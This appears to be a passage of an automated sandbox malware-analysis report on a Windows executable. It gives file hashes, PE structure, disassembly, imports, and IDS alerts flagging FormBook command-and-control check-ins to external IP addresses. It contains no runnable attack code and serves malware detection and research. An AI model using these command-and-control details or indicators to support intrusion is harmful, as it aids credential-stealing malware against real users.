                                                                                                                                                                                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                                                                                                                                                                              MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                                                                                                                                                                              SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                                                                                                                                                                              SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                                                                                                                                                                              SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Keily

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\N2Qncau2rN.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):288256
                                                                                                                                                                                                              Entropy (8bit):7.993435173307934
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:6144:0U+OS51KmKlOyL3VfDxGb96q6B588GI5f704njbPiSQFSGz:BSzWhNGbAq6P8895f7eSQFvz
                                                                                                                                                                                                              MD5:AE51354D8ED39A1721CE578975302325
                                                                                                                                                                                                              SHA1:8C4E231E4722DA9B08ABF517D7DEC408EB51060B
                                                                                                                                                                                                              SHA-256:49FC2721F0A256F19323C007435D8097A08B09E3FEFAB268A302D7C4382634DE
                                                                                                                                                                                                              SHA-512:5648C3944467C8E865257E19D7B4A3E71F198B157CE9B242C95338C43F5D04E28787D071381627925D5C7D1C623A0AECDEBB6C61EAE45DF5A662B9992B98BE23
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Preview:.....LFDHl.G...e.VO..lK<...GSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH.ZZNIL.:Y._.w.G....2'4s;F6($-;l%%&Z5.n%6kF,!v%8l....75*"}F9SkVLVLFDHM[S.z3,.d/1.k,!.R..t'4....p6+.^.f. ..]:'k,1.FDH4ZZNG..4Y.WMV0...4ZZNGSK4.OTM]MMDH`^ZNGSK4YOV<BLFDX4ZZ>CSK4.OV\VLFFH4\ZNGSK4YIVLVLFDH4*^NGQK4YOVLTL..H4JZNWSK4Y_VLFLFDH4ZJNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFj<Q".NGS_f]OV\VLF.L4ZJNGSK4YOVLVLFDH.ZZ.GSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNG

                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                              General

                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Entropy (8bit):7.561166328997874
                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                              File name:N2Qncau2rN.exe
                                                                                                                                                                                                              File size:1'401'699 bytes
                                                                                                                                                                                                              MD5:47d011ced9bd433871f605c662c06b55
                                                                                                                                                                                                              SHA1:fd2e3100dcad95fd1fc6614a71ba0ac15bd3b05e
                                                                                                                                                                                                              SHA256:d649d0beff04be12fbad6cdb84d0f2460208309f845c890f0fa162a27d61051f
                                                                                                                                                                                                              SHA512:3963efa4bb57b9a16b18f4d740529464476760bba56ce2cb5ca44c60a082081eb5ed26838f585ea4f9a3937d77cd55e41606bdc847d0d34b8092e1dd5176fa5d
                                                                                                                                                                                                              SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCJ/g5aAwDH/UUgUdmcGsQm2yuxrM:7JZoQrbTFZY1iaCJY5athMsR2a
                                                                                                                                                                                                              TLSH:CD55E121F5C69076C1B323B19E7EF36A963D79360336D29B27C42D221EA05416B3A773
                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                              Icon Hash:1733312925935517

                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Entrypoint:0x4165c1
                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                              Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                              Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                              call 00007FAEED055F6Bh
                                                                                                                                                                                                              jmp 00007FAEED04CDDEh
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                              push edi
                                                                                                                                                                                                              push esi
                                                                                                                                                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                                                              mov ecx, dword ptr [ebp+10h]
                                                                                                                                                                                                              mov edi, dword ptr [ebp+08h]
                                                                                                                                                                                                              mov eax, ecx
                                                                                                                                                                                                              mov edx, ecx
                                                                                                                                                                                                              add eax, esi
                                                                                                                                                                                                              cmp edi, esi
                                                                                                                                                                                                              jbe 00007FAEED04CF5Ah
                                                                                                                                                                                                              cmp edi, eax
                                                                                                                                                                                                              jc 00007FAEED04D0F6h
                                                                                                                                                                                                              cmp ecx, 00000080h
                                                                                                                                                                                                              jc 00007FAEED04CF6Eh
                                                                                                                                                                                                              cmp dword ptr [004A9724h], 00000000h
                                                                                                                                                                                                              je 00007FAEED04CF65h
                                                                                                                                                                                                              push edi
                                                                                                                                                                                                              push esi
                                                                                                                                                                                                              and edi, 0Fh
                                                                                                                                                                                                              and esi, 0Fh
                                                                                                                                                                                                              cmp edi, esi
                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                              pop edi
                                                                                                                                                                                                              jne 00007FAEED04CF57h
                                                                                                                                                                                                              jmp 00007FAEED04D332h
                                                                                                                                                                                                              test edi, 00000003h
                                                                                                                                                                                                              jne 00007FAEED04CF66h
                                                                                                                                                                                                              shr ecx, 02h
                                                                                                                                                                                                              and edx, 03h
                                                                                                                                                                                                              cmp ecx, 08h
                                                                                                                                                                                                              jc 00007FAEED04CF7Bh
                                                                                                                                                                                                              rep movsd
                                                                                                                                                                                                              jmp dword ptr [00416740h+edx*4]
                                                                                                                                                                                                              mov eax, edi
                                                                                                                                                                                                              mov edx, 00000003h
                                                                                                                                                                                                              sub ecx, 04h
                                                                                                                                                                                                              jc 00007FAEED04CF5Eh
                                                                                                                                                                                                              and eax, 03h
                                                                                                                                                                                                              add ecx, eax
                                                                                                                                                                                                              jmp dword ptr [00416654h+eax*4]
                                                                                                                                                                                                              jmp dword ptr [00416750h+ecx*4]
                                                                                                                                                                                                              nop
                                                                                                                                                                                                              jmp dword ptr [004166D4h+ecx*4]
                                                                                                                                                                                                              nop
                                                                                                                                                                                                              inc cx
                                                                                                                                                                                                              add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                                                                                                              inc cx
                                                                                                                                                                                                              add byte ptr [ebx], ah
                                                                                                                                                                                                              ror dword ptr [edx-75F877FAh], 1
                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                              add dword ptr [eax+468A0147h], ecx
                                                                                                                                                                                                              add al, cl
                                                                                                                                                                                                              jmp 00007FAEEF4C5757h
                                                                                                                                                                                                              add esi, 03h
                                                                                                                                                                                                              add edi, 03h
                                                                                                                                                                                                              cmp ecx, 08h
                                                                                                                                                                                                              jc 00007FAEED04CF1Eh
                                                                                                                                                                                                              rep movsd
                                                                                                                                                                                                              jmp dword ptr [00000000h+edx*4]

                                                                                                                                                                                                              Rich Headers

                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                              • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                              • [C++] VS2010 SP1 build 40219
                                                                                                                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                              • [ASM] VS2010 SP1 build 40219
                                                                                                                                                                                                              • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                              • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                              Sections

                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                              .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                              .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                              Resources

                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                              RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                                                                              RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                                                                              RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                                                              RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                                                                                                              RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                                                                                                              RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                                                                                                              RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                                                                                                              RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                                                                                                              RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                                                                                                              RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                                                                                                              RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                                                                                                              RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                                                                                                              RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                                                                                                              RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                                                                                                              RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                                                                                                              RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                                                                                                              RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                                                                                                              RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                                                              RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                                                              RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                                                                                                                              RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                                                                                                              RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                                                                                                              RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                                                                                                                              RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                              RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                              RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                                                                                                              RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                                                                                                              Imports

                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                              WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                                                                                              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                                                              COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                                                                                              MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                                                                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                                                                                              PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                                                                                              USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                                                                                              KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                                                                                                              USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                                                                                                              GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                                                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                                                              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                                                                                                              OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                              EnglishGreat Britain
                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                              2024-10-08T15:33:37.818114+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.9605493.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:33:37.818114+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.9605493.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:33:53.420266+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.96055174.208.236.2580TCP
                                                                                                                                                                                                              2024-10-08T15:33:55.974521+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.96055274.208.236.2580TCP
                                                                                                                                                                                                              2024-10-08T15:33:58.518622+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.96055974.208.236.2580TCP
                                                                                                                                                                                                              2024-10-08T15:34:01.420541+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.96057574.208.236.2580TCP
                                                                                                                                                                                                              2024-10-08T15:34:01.420541+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.96057574.208.236.2580TCP
                                                                                                                                                                                                              2024-10-08T15:34:07.984460+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.9606113.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:34:10.398319+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.9606273.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:34:12.054678+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.9606413.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:34:14.561340+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.9606573.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:34:14.561340+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.9606573.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:34:21.140669+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.9606793.33.130.19080TCP
                                                                                                                                                                                                              2024-10-08T15:34:23.564525+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.9606983.33.130.19080TCP
